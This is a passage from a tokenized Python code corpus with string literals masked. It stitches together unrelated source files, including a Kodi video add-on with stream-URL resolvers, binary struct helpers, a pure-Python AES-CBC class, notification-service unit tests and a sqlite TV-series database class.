'<STR_LIT>' ) <EOL> genre = genre . encode ( '<STR_LIT:utf-8>' ) <EOL> duration = item [ '<STR_LIT>' ] <EOL> if duration == None or duration == '<STR_LIT>' or duration == '<STR_LIT>' : duration = '<STR_LIT:0>' <EOL> duration = re . sub ( '<STR_LIT>' , '<STR_LIT>' , str ( duration ) ) <EOL> duration = duration . encode ( '<STR_LIT:utf-8>' ) <EOL> rating = item [ '<STR_LIT>' ] <EOL> if rating == None or rating == '<STR_LIT>' or rating == '<STR_LIT>' or rating == '<STR_LIT>' : rating = '<STR_LIT:0>' <EOL> rating = rating . encode ( '<STR_LIT:utf-8>' ) <EOL> votes = item [ '<STR_LIT>' ] <EOL> try : votes = str ( format ( int ( votes ) , '<STR_LIT>' ) ) <EOL> except : pass <EOL> if votes == None or votes == '<STR_LIT>' or votes == '<STR_LIT>' : votes = '<STR_LIT:0>' <EOL> votes = votes . encode ( '<STR_LIT:utf-8>' ) <EOL> mpaa = item [ '<STR_LIT>' ] <EOL> if mpaa == None or mpaa == '<STR_LIT>' or mpaa == '<STR_LIT>' : mpaa = '<STR_LIT:0>' <EOL> mpaa = mpaa . encode ( '<STR_LIT:utf-8>' ) <EOL> director = item [ '<STR_LIT>' ] <EOL> if director == None or director == '<STR_LIT>' or director == '<STR_LIT>' : director = '<STR_LIT:0>' <EOL> director = director . replace ( '<STR_LIT:U+002CU+0020>' , '<STR_LIT>' ) <EOL> director = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , director ) <EOL> director = '<STR_LIT:U+0020>' . join ( director . split ( ) ) <EOL> director = director . encode ( '<STR_LIT:utf-8>' ) <EOL> writer = item [ '<STR_LIT>' ] <EOL> if writer == None or writer == '<STR_LIT>' or writer == '<STR_LIT>' : writer = '<STR_LIT:0>' <EOL> writer = writer . replace ( '<STR_LIT:U+002CU+0020>' , '<STR_LIT>' ) <EOL> writer = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , writer ) <EOL> writer = '<STR_LIT:U+0020>' . join ( writer . split ( ) ) <EOL> writer = writer . encode ( '<STR_LIT:utf-8>' ) <EOL> cast = item [ '<STR_LIT>' ] <EOL> if cast == None or cast == '<STR_LIT>' or cast == '<STR_LIT>' : cast = '<STR_LIT:0>' <EOL> cast = [ x . strip ( ) for x in cast . split ( '<STR_LIT:U+002C>' ) if not x == '<STR_LIT>' ] <EOL> try : cast = [ ( x . encode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' ) for x in cast ] <EOL> except : cast = [ ] <EOL> if cast == [ ] : cast = '<STR_LIT:0>' <EOL> plot = item [ '<STR_LIT>' ] <EOL> if plot == None or plot == '<STR_LIT>' or plot == '<STR_LIT>' : plot = '<STR_LIT:0>' <EOL> plot = client . replaceHTMLCodes ( plot ) <EOL> plot = plot . encode ( '<STR_LIT:utf-8>' ) <EOL> tagline = re . compile ( '<STR_LIT>' ) . split ( plot ) [ <NUM_LIT:0> ] <EOL> try : tagline = tagline . encode ( '<STR_LIT:utf-8>' ) <EOL> except : pass <EOL> self . list . append ( { '<STR_LIT:title>' : title , '<STR_LIT>' : title , '<STR_LIT>' : year , '<STR_LIT>' : genre , '<STR_LIT>' : duration , '<STR_LIT>' : rating , '<STR_LIT>' : votes , '<STR_LIT>' : mpaa , '<STR_LIT>' : director , '<STR_LIT>' : writer , '<STR_LIT>' : cast , '<STR_LIT>' : plot , '<STR_LIT>' : tagline , '<STR_LIT:name>' : name , '<STR_LIT:code>' : imdb , '<STR_LIT>' : imdb , '<STR_LIT>' : poster , '<STR_LIT>' : i [ <NUM_LIT:2> ] , '<STR_LIT>' : i [ <NUM_LIT:3> ] } ) <EOL> except : <EOL> pass <EOL> def uk_datetime ( self ) : <EOL> dt = datetime . datetime . utcnow ( ) + datetime . timedelta ( hours = <NUM_LIT:0> ) <EOL> d = datetime . datetime ( dt . year , <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> dston = d - datetime . timedelta ( days = d . weekday ( ) + <NUM_LIT:1> ) <EOL> d = datetime . datetime ( dt . year , <NUM_LIT:11> , <NUM_LIT:1> ) <EOL> dstoff = d - datetime . timedelta ( days = d . weekday ( ) + <NUM_LIT:1> ) <EOL> if dston <= dt < dstoff : <EOL> return dt + datetime . timedelta ( hours = <NUM_LIT:1> ) <EOL> else : <EOL> return dt <EOL> def channelDirectory ( self , items ) : <EOL> if items == None or len ( items ) == <NUM_LIT:0> : return <EOL> playbackMenu = control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) if control . setting ( '<STR_LIT>' ) == '<STR_LIT:true>' else control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) <EOL> addonPoster , addonBanner = control . addonPoster ( ) , control . addonBanner ( ) <EOL> addonFanart = control . addonFanart ( ) <EOL> sysaddon = sys . argv [ <NUM_LIT:0> ] <EOL> for i in items : <EOL> try : <EOL> label = "<STR_LIT>" % ( i [ '<STR_LIT>' ] . upper ( ) , i [ '<STR_LIT:name>' ] ) <EOL> sysname = urllib . quote_plus ( i [ '<STR_LIT:name>' ] ) <EOL> systitle = urllib . quote_plus ( i [ '<STR_LIT:title>' ] ) <EOL> imdb , tmdb , year = i [ '<STR_LIT>' ] , '<STR_LIT:0>' , i [ '<STR_LIT>' ] <EOL> poster , banner = i [ '<STR_LIT>' ] , i [ '<STR_LIT>' ] <EOL> if poster == '<STR_LIT:0>' : poster = addonPoster <EOL> if banner == '<STR_LIT:0>' and poster == '<STR_LIT:0>' : banner = addonBanner <EOL> elif banner == '<STR_LIT:0>' : banner = poster <EOL> meta = dict ( ( k , v ) for k , v in i . iteritems ( ) if not v == '<STR_LIT:0>' ) <EOL> meta . update ( { '<STR_LIT>' : '<STR_LIT>' % ( sysaddon , sysname ) } ) <EOL> if i [ '<STR_LIT>' ] == '<STR_LIT:0>' : meta . update ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> try : meta . update ( { '<STR_LIT>' : str ( int ( meta [ '<STR_LIT>' ] ) * <NUM_LIT> ) } ) <EOL> except : pass <EOL> sysmeta = urllib . quote_plus ( json . dumps ( meta ) ) <EOL> url = '<STR_LIT>' % ( sysaddon , sysname , systitle , year , imdb , tmdb , sysmeta , self . systime ) <EOL> sysurl = urllib . quote_plus ( url ) <EOL> cm = [ ] <EOL> cm . append ( ( playbackMenu , '<STR_LIT>' % ( sysaddon , sysurl , sysmeta ) ) ) <EOL> cm . append ( ( control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' ) ) <EOL> cm . append ( ( control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' % ( sysaddon ) ) ) <EOL> cm . append ( ( control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' % ( sysaddon ) ) ) <EOL> cm . append ( ( control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' % ( sysaddon ) ) ) <EOL> item = control . item ( label = label , iconImage = poster , thumbnailImage = poster ) <EOL> try : item . setArt ( { '<STR_LIT>' : poster , '<STR_LIT>' : banner } ) <EOL> except : pass <EOL> if not addonFanart == None : <EOL> item . setProperty ( '<STR_LIT>' , addonFanart ) <EOL> item . setInfo ( type = '<STR_LIT>' , infoLabels = meta ) <EOL> item . setProperty ( '<STR_LIT>' , '<STR_LIT:true>' ) <EOL> item . addContextMenuItems ( cm , replaceItems = True ) <EOL> control . addItem ( handle = int ( sys . argv [ <NUM_LIT:1> ] ) , url = url , listitem = item , isFolder = False ) <EOL> except : <EOL> pass <EOL> control . content ( int ( sys . argv [ <NUM_LIT:1> ] ) , '<STR_LIT>' ) <EOL> control . directory ( int ( sys . argv [ <NUM_LIT:1> ] ) , cacheToDisc = True ) </s>
<s> import struct <EOL> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class EndOfFile ( Exception ) : <EOL> pass <EOL> def get_ui32 ( f ) : <EOL> try : <EOL> ret = struct . unpack ( "<STR_LIT>" , f . read ( <NUM_LIT:4> ) ) [ <NUM_LIT:0> ] <EOL> except struct . error : <EOL> raise EndOfFile <EOL> return ret <EOL> def make_ui32 ( num ) : <EOL> return struct . pack ( "<STR_LIT>" , num ) <EOL> def get_si32_extended ( f ) : <EOL> low_high = f . read ( <NUM_LIT:4> ) <EOL> if len ( low_high ) < <NUM_LIT:4> : <EOL> raise EndOfFile <EOL> combined = low_high [ <NUM_LIT:3> ] + low_high [ : <NUM_LIT:3> ] <EOL> return struct . unpack ( "<STR_LIT>" , combined ) [ <NUM_LIT:0> ] <EOL> def make_si32_extended ( num ) : <EOL> ret = struct . pack ( "<STR_LIT>" , num ) <EOL> return ret [ <NUM_LIT:1> : ] + ret [ <NUM_LIT:0> ] <EOL> def get_ui24 ( f ) : <EOL> try : <EOL> high , low = struct . unpack ( "<STR_LIT>" , f . read ( <NUM_LIT:3> ) ) <EOL> except struct . error : <EOL> raise EndOfFile <EOL> ret = ( high << <NUM_LIT:16> ) + low <EOL> return ret <EOL> def make_ui24 ( num ) : <EOL> ret = struct . pack ( "<STR_LIT>" , num ) <EOL> return ret [ <NUM_LIT:1> : ] <EOL> def get_ui16 ( f ) : <EOL> try : <EOL> ret = struct . unpack ( "<STR_LIT>" , f . read ( <NUM_LIT:2> ) ) [ <NUM_LIT:0> ] <EOL> except struct . error : <EOL> raise EndOfFile <EOL> return ret <EOL> def make_ui16 ( num ) : <EOL> return struct . pack ( "<STR_LIT>" , num ) <EOL> def get_si16 ( f ) : <EOL> try : <EOL> ret = struct . unpack ( "<STR_LIT>" , f . read ( <NUM_LIT:2> ) ) [ <NUM_LIT:0> ] <EOL> except struct . error : <EOL> raise EndOfFile <EOL> return ret <EOL> def make_si16 ( num ) : <EOL> return struct . pack ( "<STR_LIT>" , num ) <EOL> def get_ui8 ( f ) : <EOL> try : <EOL> ret = struct . unpack ( "<STR_LIT:B>" , f . read ( <NUM_LIT:1> ) ) [ <NUM_LIT:0> ] <EOL> except struct . error : <EOL> raise EndOfFile <EOL> return ret <EOL> def make_ui8 ( num ) : <EOL> return struct . pack ( "<STR_LIT:B>" , num ) <EOL> def get_double ( f ) : <EOL> data = f . read ( <NUM_LIT:8> ) <EOL> try : <EOL> ret = struct . unpack ( "<STR_LIT>" , data ) [ <NUM_LIT:0> ] <EOL> except struct . error : <EOL> raise EndOfFile <EOL> return ret <EOL> def make_double ( num ) : <EOL> return struct . pack ( "<STR_LIT>" , num ) </s>
<s> """<STR_LIT>""" <EOL> from . cryptomath import * <EOL> from . aes import * <EOL> from . rijndael import rijndael <EOL> def new ( key , mode , IV ) : <EOL> return Python_AES ( key , mode , IV ) <EOL> class Python_AES ( AES ) : <EOL> def __init__ ( self , key , mode , IV ) : <EOL> AES . __init__ ( self , key , mode , IV , "<STR_LIT>" ) <EOL> self . rijndael = rijndael ( key , <NUM_LIT:16> ) <EOL> self . IV = IV <EOL> def encrypt ( self , plaintext ) : <EOL> AES . encrypt ( self , plaintext ) <EOL> plaintextBytes = plaintext [ : ] <EOL> chainBytes = self . IV [ : ] <EOL> for x in range ( len ( plaintextBytes ) // <NUM_LIT:16> ) : <EOL> blockBytes = plaintextBytes [ x * <NUM_LIT:16> : ( x * <NUM_LIT:16> ) + <NUM_LIT:16> ] <EOL> for y in range ( <NUM_LIT:16> ) : <EOL> blockBytes [ y ] ^= chainBytes [ y ] <EOL> encryptedBytes = self . rijndael . encrypt ( blockBytes ) <EOL> for y in range ( <NUM_LIT:16> ) : <EOL> plaintextBytes [ ( x * <NUM_LIT:16> ) + y ] = encryptedBytes [ y ] <EOL> chainBytes = encryptedBytes <EOL> self . IV = chainBytes [ : ] <EOL> return plaintextBytes <EOL> def decrypt ( self , ciphertext ) : <EOL> AES . decrypt ( self , ciphertext ) <EOL> ciphertextBytes = ciphertext [ : ] <EOL> chainBytes = self . IV [ : ] <EOL> for x in range ( len ( ciphertextBytes ) // <NUM_LIT:16> ) : <EOL> blockBytes = ciphertextBytes [ x * <NUM_LIT:16> : ( x * <NUM_LIT:16> ) + <NUM_LIT:16> ] <EOL> decryptedBytes = self . rijndael . decrypt ( blockBytes ) <EOL> for y in range ( <NUM_LIT:16> ) : <EOL> decryptedBytes [ y ] ^= chainBytes [ y ] <EOL> ciphertextBytes [ ( x * <NUM_LIT:16> ) + y ] = decryptedBytes [ y ] <EOL> chainBytes = blockBytes <EOL> self . IV = chainBytes [ : ] <EOL> return ciphertextBytes </s>
<s> '''<STR_LIT>''' <EOL> import threading <EOL> class Thread ( threading . Thread ) : <EOL> def __init__ ( self , target , * args ) : <EOL> self . _target = target <EOL> self . _args = args <EOL> threading . Thread . __init__ ( self ) <EOL> def run ( self ) : <EOL> self . _target ( * self . _args ) </s>
<s> '''<STR_LIT>''' <EOL> import re <EOL> from resources . lib . libraries import client <EOL> from resources . lib . libraries import jsunpack <EOL> def resolve ( url ) : <EOL> try : <EOL> url = url . replace ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> url = re . compile ( '<STR_LIT>' ) . findall ( url ) [ <NUM_LIT:0> ] <EOL> url = '<STR_LIT>' % url <EOL> result = client . request ( url , mobile = True ) <EOL> result = re . compile ( '<STR_LIT>' ) . findall ( result ) [ - <NUM_LIT:1> ] <EOL> result = jsunpack . unpack ( result ) <EOL> url = client . parseDOM ( result , '<STR_LIT>' , ret = '<STR_LIT:src>' ) <EOL> url += re . compile ( "<STR_LIT>" ) . findall ( result ) <EOL> url = [ i for i in url if not i . endswith ( '<STR_LIT>' ) ] <EOL> url = '<STR_LIT>' + url [ <NUM_LIT:0> ] . split ( '<STR_LIT>' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] <EOL> return url <EOL> except : <EOL> return </s>
<s> '''<STR_LIT>''' <EOL> import re , urllib <EOL> from resources . lib . libraries import client <EOL> def resolve ( url ) : <EOL> try : <EOL> url = re . compile ( '<STR_LIT>' ) . findall ( url ) [ <NUM_LIT:0> ] <EOL> url = '<STR_LIT>' % url <EOL> result = client . request ( url ) <EOL> post = { } <EOL> f = client . parseDOM ( result , '<STR_LIT>' , attrs = { '<STR_LIT:class>' : '<STR_LIT>' } ) [ <NUM_LIT:0> ] <EOL> k = client . parseDOM ( f , '<STR_LIT:input>' , ret = '<STR_LIT:name>' , attrs = { '<STR_LIT:type>' : '<STR_LIT>' } ) <EOL> for i in k : post . update ( { i : client . parseDOM ( f , '<STR_LIT:input>' , ret = '<STR_LIT:value>' , attrs = { '<STR_LIT:name>' : i } ) [ <NUM_LIT:0> ] } ) <EOL> post = post . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> result = client . request ( url , post = post ) <EOL> url = re . compile ( '<STR_LIT>' ) . findall ( result ) [ - <NUM_LIT:1> ] <EOL> return url <EOL> except : <EOL> return </s>
<s> '''<STR_LIT>''' <EOL> import re , urllib <EOL> from resources . lib . libraries import client <EOL> def resolve ( url ) : <EOL> try : <EOL> id = url . split ( "<STR_LIT>" ) [ - <NUM_LIT:1> ] . split ( "<STR_LIT:/>" ) [ - <NUM_LIT:1> ] . split ( "<STR_LIT:?>" ) [ <NUM_LIT:0> ] . split ( "<STR_LIT:&>" ) [ <NUM_LIT:0> ] <EOL> result = client . request ( '<STR_LIT>' % id ) <EOL> message = client . parseDOM ( result , '<STR_LIT>' , attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> message = '<STR_LIT>' . join ( message ) <EOL> alert = client . parseDOM ( result , '<STR_LIT>' , attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> if re . search ( '<STR_LIT>' , result ) : <EOL> url = live ( result , id ) <EOL> if not url == None : return url <EOL> if len ( alert ) > <NUM_LIT:0> : raise Exception ( ) <EOL> if re . search ( '<STR_LIT>' , message ) : raise Exception ( ) <EOL> url = '<STR_LIT>' % id <EOL> return url <EOL> except : <EOL> return <EOL> def live ( result , id ) : <EOL> try : <EOL> hls = re . compile ( '<STR_LIT>' ) . findall ( result ) <EOL> if len ( hls ) == <NUM_LIT:0> : <EOL> url = '<STR_LIT>' % id <EOL> url = '<STR_LIT>' % url <EOL> hls = client . request ( url ) <EOL> hls = re . compile ( '<STR_LIT>' ) . findall ( hls ) <EOL> url = urllib . unquote ( hls [ <NUM_LIT:0> ] ) . replace ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> result = client . request ( url ) <EOL> result = result . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> url = re . compile ( '<STR_LIT>' ) . findall ( result ) <EOL> url = [ ( int ( i [ <NUM_LIT:0> ] ) , i [ <NUM_LIT:1> ] ) for i in url ] <EOL> url . sort ( ) <EOL> url = url [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> return url <EOL> except : <EOL> return </s>
<s> '''<STR_LIT>''' <EOL> import re , urlparse , json <EOL> from resources . lib . libraries import client <EOL> from resources . lib import resolvers <EOL> class source : <EOL> def __init__ ( self ) : <EOL> self . base_link = '<STR_LIT>' <EOL> self . search_link = '<STR_LIT>' <EOL> def get_movie ( self , imdb , title , year ) : <EOL> try : <EOL> query = self . search_link % imdb <EOL> query = urlparse . urljoin ( self . base_link , query ) <EOL> result = client . source ( query ) <EOL> result = json . loads ( result ) <EOL> result = result [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> url = '<STR_LIT>' % result <EOL> url = client . replaceHTMLCodes ( url ) <EOL> url = url . encode ( '<STR_LIT:utf-8>' ) <EOL> return url <EOL> except : <EOL> return <EOL> def get_show ( self , imdb , tvdb , tvshowtitle , year ) : <EOL> try : <EOL> url = '<STR_LIT>' % ( tvshowtitle , year ) <EOL> url = client . replaceHTMLCodes ( url ) <EOL> url = url . encode ( '<STR_LIT:utf-8>' ) <EOL> return url <EOL> except : <EOL> return <EOL> def get_episode ( self , url , imdb , tvdb , title , date , season , episode ) : <EOL> try : <EOL> query = self . search_link % imdb <EOL> query = urlparse . urljoin ( self . base_link , query ) <EOL> result = client . source ( query ) <EOL> result = json . loads ( result ) <EOL> result = result [ '<STR_LIT>' ] <EOL> season = '<STR_LIT>' % int ( season ) <EOL> episode = '<STR_LIT>' % int ( episode ) <EOL> result = [ ( i [ '<STR_LIT>' ] , i [ '<STR_LIT>' ] ) for i in result ] <EOL> result = [ ( i [ <NUM_LIT:0> ] , re . compile ( '<STR_LIT>' ) . findall ( i [ <NUM_LIT:1> ] ) ) for i in result ] <EOL> result = [ ( i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) for i in result if len ( i [ <NUM_LIT:1> ] ) > <NUM_LIT:0> ] <EOL> result = [ i [ <NUM_LIT:0> ] for i in result if season == i [ <NUM_LIT:1> ] ] [ <NUM_LIT:0> ] <EOL> url = '<STR_LIT>' % ( result , season , episode ) <EOL> url = client . replaceHTMLCodes ( url ) <EOL> url = url . encode ( '<STR_LIT:utf-8>' ) <EOL> return url <EOL> except : <EOL> return <EOL> def get_sources ( self , url , hosthdDict , hostDict , locDict ) : <EOL> try : <EOL> sources = [ ] <EOL> if url == None : return sources <EOL> query = urlparse . urlparse ( url ) . query <EOL> try : query = '<STR_LIT>' % int ( re . compile ( '<STR_LIT>' ) . findall ( query ) [ <NUM_LIT:0> ] ) <EOL> except : query = '<STR_LIT>' <EOL> url = urlparse . urljoin ( self . base_link , url ) <EOL> result = client . source ( url ) <EOL> result = client . parseDOM ( result , '<STR_LIT>' , attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) [ <NUM_LIT:0> ] <EOL> result = zip ( client . parseDOM ( result , '<STR_LIT>' , ret = '<STR_LIT:value>' ) , client . parseDOM ( result , '<STR_LIT>' ) ) <EOL> result = [ i [ <NUM_LIT:0> ] for i in result if i [ <NUM_LIT:1> ] . endswith ( query ) or query == '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> direct = re . compile ( '<STR_LIT>' ) . findall ( result ) <EOL> if len ( direct ) > <NUM_LIT:0> : <EOL> quality = '<STR_LIT>' if '<STR_LIT>' in direct [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . lower ( ) else '<STR_LIT>' <EOL> sources . append ( { '<STR_LIT:source>' : '<STR_LIT>' , '<STR_LIT>' : quality , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:url>' : direct [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] } ) <EOL> return sources <EOL> url = urlparse . urljoin ( self . base_link , result ) <EOL> url = client . source ( url , output = '<STR_LIT>' ) <EOL> if not '<STR_LIT>' in url : raise Exception ( ) <EOL> url = url . split ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> url = resolvers . request ( url ) <EOL> for i in url : sources . append ( { '<STR_LIT:source>' : '<STR_LIT>' , '<STR_LIT>' : i [ '<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:url>' : i [ '<STR_LIT:url>' ] } ) <EOL> return sources <EOL> except : <EOL> return sources <EOL> def resolve ( self , url ) : <EOL> try : <EOL> if url . startswith ( '<STR_LIT>' ) : return url <EOL> url = client . request ( url , output = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in url : url = url . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : url = url . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return url <EOL> except : <EOL> return </s>
<s> from . api import Mint <EOL> from . api import get_accounts <EOL> from . api import get_budgets <EOL> from . api import initiate_account_refresh <EOL> from . api import main <EOL> from . api import print_accounts </s>
<s> import unittest <EOL> import os <EOL> import sys <EOL> sys . path . append ( os . getcwd ( ) ) <EOL> from notifo import Notifo , send_notification <EOL> class TestNotifyUser ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . provider = "<STR_LIT>" <EOL> self . user = "<STR_LIT>" <EOL> self . provider_token = "<STR_LIT>" <EOL> self . user_token = "<STR_LIT>" <EOL> def test_notify_self ( self ) : <EOL> res = send_notification ( self . user , self . user_token , <EOL> to = self . user , msg = "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_notify_self_with_object ( self ) : <EOL> res = Notifo ( self . user , self . user_token ) . send_notification ( <EOL> to = self . user , msg = "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_message_with_label ( self ) : <EOL> res = send_notification ( self . user , self . user_token , <EOL> to = self . user , msg = "<STR_LIT>" , label = "<STR_LIT:label>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_message_with_plain_args ( self ) : <EOL> res = send_notification ( self . user , self . user_token , <EOL> self . user , "<STR_LIT>" , "<STR_LIT:label>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_message_with_title ( self ) : <EOL> res = send_notification ( self . user , self . user_token , <EOL> to = self . user , msg = "<STR_LIT>" , title = "<STR_LIT:title>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_message_with_callback ( self ) : <EOL> res = send_notification ( self . user , self . user_token , <EOL> to = self . user , msg = "<STR_LIT>" , <EOL> uri = "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_message_from_provider ( self ) : <EOL> res = send_notification ( self . provider , self . provider_token , <EOL> to = self . user , msg = "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import sqlite3 <EOL> from datetime import datetime <EOL> import config <EOL> import metadata <EOL> SERIES_COLUMNS = "<STR_LIT>" <EOL> EPISODE_COLUMNS = "<STR_LIT>" <EOL> MOVIE_COLUMNS = "<STR_LIT>" <EOL> TIME_FORMAT = '<STR_LIT>' <EOL> ORIGINAL_AIR_DATE_FORMAT = '<STR_LIT>' <EOL> class Database ( ) : <EOL> def __init__ ( self , config , debug ) : <EOL> self . debug = debug <EOL> database_file = config . getDatabaseFile ( ) <EOL> self . connection = sqlite3 . connect ( database_file ) <EOL> def get_series ( self , id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , ) <EOL> c . execute ( sql , ( id , ) ) <EOL> results = c . fetchall ( ) <EOL> if len ( results ) == <NUM_LIT:1> : <EOL> r = results [ <NUM_LIT:0> ] <EOL> to_return = self . create_series_from_row ( r ) <EOL> return to_return <EOL> else : <EOL> return None <EOL> finally : <EOL> c . close ( ) <EOL> def get_all_series ( self ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , ) <EOL> c . execute ( sql ) <EOL> to_return = [ ] <EOL> results = c . fetchall ( ) <EOL> for r in results : <EOL> to_return . append ( self . create_series_from_row ( r ) ) <EOL> return to_return <EOL> finally : <EOL> c . close ( ) <EOL> def add_series ( self , series ) : <EOL> existing_series = self . get_series ( series . id ) <EOL> if existing_series is None : <EOL> if self . debug : <EOL> print "<STR_LIT>" % ( series . title , ) <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> if series . watch : <EOL> watch = <NUM_LIT:1> <EOL> else : <EOL> watch = <NUM_LIT:0> <EOL> c . execute ( <EOL> '<STR_LIT>' , <EOL> ( series . id , series . zap2it_id , series . imdb_id , series . title , series . description , '<STR_LIT:|>' . join ( series . actors ) , '<STR_LIT:|>' . join ( series . genres ) , series . content_rating , watch ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> def watch_series ( self , series , watch ) : <EOL> existing_series = self . get_series ( series . id ) <EOL> if not existing_series is None : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> if watch : <EOL> db_watch = <NUM_LIT:1> <EOL> else : <EOL> db_watch = <NUM_LIT:0> <EOL> c . execute ( <EOL> '<STR_LIT>' , <EOL> ( db_watch , series . id ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> if watch : <EOL> print "<STR_LIT>" % ( series . title , ) <EOL> else : <EOL> print "<STR_LIT>" % ( series . title , ) <EOL> def get_watched_series ( self ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , ) <EOL> c . execute ( sql ) <EOL> to_return = [ ] <EOL> results = c . fetchall ( ) <EOL> for r in results : <EOL> to_return . append ( self . create_series_from_row ( r ) ) <EOL> return to_return <EOL> finally : <EOL> c . close ( ) <EOL> def clear_series ( self , series_id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' <EOL> c . execute ( sql , ( series_id , ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> def add_episode ( self , episode , series ) : <EOL> if self . debug : <EOL> print "<STR_LIT>" % ( episode . season_number , episode . episode_number , series . title ) <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> directors = '<STR_LIT:|>' . join ( episode . directors ) <EOL> guest_stars = '<STR_LIT:|>' . join ( episode . guest_stars ) <EOL> writers = '<STR_LIT:|>' . join ( episode . writers ) <EOL> executive_producers = '<STR_LIT:|>' . join ( episode . executive_producers ) <EOL> producers = '<STR_LIT:|>' . join ( episode . producers ) <EOL> if episode . original_air_date is None : <EOL> original_air_date = '<STR_LIT>' <EOL> else : <EOL> original_air_date = episode . original_air_date . strftime ( ORIGINAL_AIR_DATE_FORMAT ) <EOL> sql = '<STR_LIT>' <EOL> sql = sql + '<STR_LIT>' <EOL> sql = sql + '<STR_LIT>' <EOL> sql = sql + '<STR_LIT>' <EOL> sql = sql + '<STR_LIT>' <EOL> c . execute ( sql , <EOL> ( series . id , episode . title , episode . description , episode . season_number , <EOL> episode . episode_number , original_air_date , <EOL> episode . rating , directors , episode . host , episode . choreographer , <EOL> guest_stars , writers , executive_producers , producers ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> def clear_all_episodes ( self , series_id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' <EOL> c . execute ( sql , ( series_id , ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> def get_all_episodes ( self , series_id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , EPISODE_COLUMNS , ) <EOL> c . execute ( sql , ( series_id , ) ) <EOL> results = c . fetchall ( ) <EOL> to_return = [ ] <EOL> for r in results : <EOL> to_return . append ( self . create_episode_from_row ( r ) ) <EOL> return to_return <EOL> finally : <EOL> c . close ( ) <EOL> def get_episodes ( self , series_id , season_number ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , EPISODE_COLUMNS , ) <EOL> c . execute ( sql , ( series_id , season_number ) ) <EOL> results = c . fetchall ( ) <EOL> to_return = [ ] <EOL> for r in results : <EOL> to_return . append ( self . create_episode_from_row ( r ) ) <EOL> return to_return <EOL> finally : <EOL> c . close ( ) <EOL> def get_episode ( self , series_id , season_number , episode_number ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( 